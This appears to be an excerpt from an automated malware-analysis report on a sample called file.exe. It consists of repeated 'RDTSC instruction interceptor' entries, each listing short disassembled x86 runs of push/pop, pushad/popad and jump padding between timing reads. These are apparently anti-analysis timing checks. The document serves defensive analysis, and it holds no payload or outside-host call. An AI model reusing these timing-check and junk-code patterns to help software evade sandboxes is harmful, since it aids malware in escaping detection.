Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4C872 second address: F4C877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F50A56 second address: F50A63 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4A4CE02A28h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F50E9A second address: F50E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F50E9E second address: F50EA8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4A4CE02A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5102F second address: F5107D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CCE842Eh 0x00000007 jnc 00007F4A4CCE8426h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007F4A4CCE843Bh 0x00000015 jmp 00007F4A4CCE8435h 0x0000001a jmp 00007F4A4CCE8431h 0x0000001f push eax 0x00000020 push edx 0x00000021 jne 00007F4A4CCE8426h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5107D second address: F51081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F546E2 second address: F546E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F546E6 second address: F546F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F546F2 second address: F546F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F546F6 second address: F54702 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jng 00007F4A4CE02A26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F54702 second address: F54728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4A4CCE842Ch 0x00000008 jmp 00007F4A4CCE8435h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F54728 second address: F54737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB4B95 second address: EB4B9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB4B9B second address: EB4BA9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4A4CE02A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB4BA9 second address: EB4BBC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jnc 00007F4A4CCE8426h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB4BBC second address: EB4BDB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4A4CE02A2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4A4CE02A2Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F53E74 second address: F53EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 je 00007F4A4CCE8428h 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F4A4CCE8437h 0x00000015 js 00007F4A4CCE8426h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F53EA4 second address: F53EC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4A4CE02A35h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F53EC0 second address: F53EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F543B6 second address: F543BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F543BC second address: F543C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F543C2 second address: F543F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4A4CE02A2Ah 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F4A4CE02A2Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4A4CE02A2Fh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5A8C2 second address: F5A8E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CCE8436h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F4A4CCE8426h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5A8E6 second address: F5A904 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4A4CE02A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4A4CE02A34h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5B450 second address: F5B455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5B943 second address: F5B952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F4A4CE02A26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5BBB3 second address: F5BBBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F4A4CCE8426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5BBBF second address: F5BBD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CE02A2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007F4A4CE02A2Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5C100 second address: F5C10C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5C10C second address: F5C133 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4A4CE02A31h 0x00000008 jmp 00007F4A4CE02A31h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63FC9 second address: F63FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63FCD second address: F63FD3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63FD3 second address: F63FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F64257 second address: F64262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4A4CE02A26h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F64262 second address: F6426A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6426A second address: F64286 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4A4CE02A26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 jnl 00007F4A4CE02A26h 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F643C4 second address: F643D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F4A4CCE842Eh 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F643D7 second address: F643EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A4CE02A34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F643EF second address: F64407 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CCE8433h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F64976 second address: F6497A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6497A second address: F64988 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B98C second address: F6B992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B992 second address: F6B997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B997 second address: F6B9A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007F4A4CE02A26h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B9A3 second address: F6B9A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B9A7 second address: F6B9AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B9AD second address: F6B9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F4A4CCE8426h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C5D7 second address: F6C5FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4A4CE02A2Dh 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F4A4CE02A30h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C5FF second address: F6C606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C606 second address: F6C60C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C60C second address: F6C612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C7AC second address: F6C7B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C7B5 second address: F6C7BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C7BF second address: F6C7D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007F4A4CE02A26h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B387 second address: F6B3B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push esi 0x0000000a jmp 00007F4A4CCE842Eh 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4A4CCE8432h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B3B4 second address: F6B3CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F4A4CE02A26h 0x00000010 je 00007F4A4CE02A26h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B3CA second address: F6B3CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B3CE second address: F6B3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007F4A4CE02A2Ch 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop edi 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F742DF second address: F742F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F4A4CCE842Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F742F3 second address: F742F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F73D50 second address: F73D57 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F73EA1 second address: F73EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F73EA7 second address: F73EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F4A4CCE842Ah 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007F4A4CCE842Ah 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F73EC6 second address: F73ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F73ECD second address: F73EDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F4A4CCE842Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F73EDF second address: F73EED instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F4A4CE02A32h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F73EED second address: F73EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7F576 second address: F7F598 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4A4CE02A26h 0x00000008 jmp 00007F4A4CE02A30h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F4A4CE02A26h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7F598 second address: F7F59C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F830C0 second address: F830C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F830C4 second address: F830CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F82DD8 second address: F82DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F82DDC second address: F82E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F4A4CCE842Eh 0x0000000e jmp 00007F4A4CCE8436h 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8479B second address: F847A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F847A1 second address: F847AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jnp 00007F4A4CCE8432h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F847AF second address: F847B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F847B5 second address: F847BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F847BD second address: F847CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A4CE02A2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F847CF second address: F847D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8B7AC second address: F8B7B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8B7B2 second address: F8B7B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9577B second address: F957A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CE02A2Ah 0x00000007 jmp 00007F4A4CE02A32h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jp 00007F4A4CE02A30h 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9D820 second address: F9D825 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9D825 second address: F9D84E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A4CE02A30h 0x00000009 jmp 00007F4A4CE02A33h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9D9B1 second address: F9D9B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9D9B5 second address: F9D9DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CE02A37h 0x00000007 jnc 00007F4A4CE02A26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9D9DC second address: F9D9E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9D9E0 second address: F9DA28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A4CE02A31h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jo 00007F4A4CE02A3Ah 0x00000013 jmp 00007F4A4CE02A34h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c jmp 00007F4A4CE02A31h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9DA28 second address: F9DA34 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9DA34 second address: F9DA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9DB74 second address: F9DB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A4CCE842Dh 0x00000009 je 00007F4A4CCE8426h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9DB90 second address: F9DBA7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4A4CE02A26h 0x00000008 jbe 00007F4A4CE02A26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9DBA7 second address: F9DBC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CCE8433h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9DBC2 second address: F9DBCC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4A4CE02A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9DF60 second address: F9DF6C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4A4CCE8426h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9DF6C second address: F9DF74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9DF74 second address: F9DF78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA2D98 second address: FA2DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
